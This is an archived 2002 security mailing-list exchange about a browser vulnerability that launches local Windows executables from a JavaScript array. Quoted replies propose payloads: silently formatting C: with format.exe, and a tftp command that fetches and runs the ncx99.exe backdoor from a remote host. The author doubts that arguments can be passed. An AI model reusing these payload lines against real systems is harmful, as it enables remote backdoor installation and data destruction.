Im not sure who else has looked at this, but I dont believe its possible to run programs with arguments using this vuln. On 03.13.02, NoCoNFLiC <noconat_private> wrote: > [nyquistat_private] Wed, Mar 13, 2002 at 08:45:46AM +0000 wrote: > > If this is confirmed, could this array by changed to equal, erm...let's > > say format.exe (with a couple of parameters to silently format C:/)? > > > > var programName=new Array( > > 'c:/windows/system32/logoff.exe', > > 'c:/winxp/system32/logoff.exe', > > 'c:/winnt/system32/logoff.exe' > > > I havent tried, since i don't run MS, how about ? > > var programName=new Array( > 'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe', > 'c:/winnt/system32/ncx99.exe', > ); > > > - nocon > > -- + methodic >> [http://methodic.angrypacket.com] -- - + Cannot find nsabackdoor.dll. Please reinstall Windows.
This archive was generated by hypermail 2b30 : Thu Mar 14 2002 - 08:25:19 PST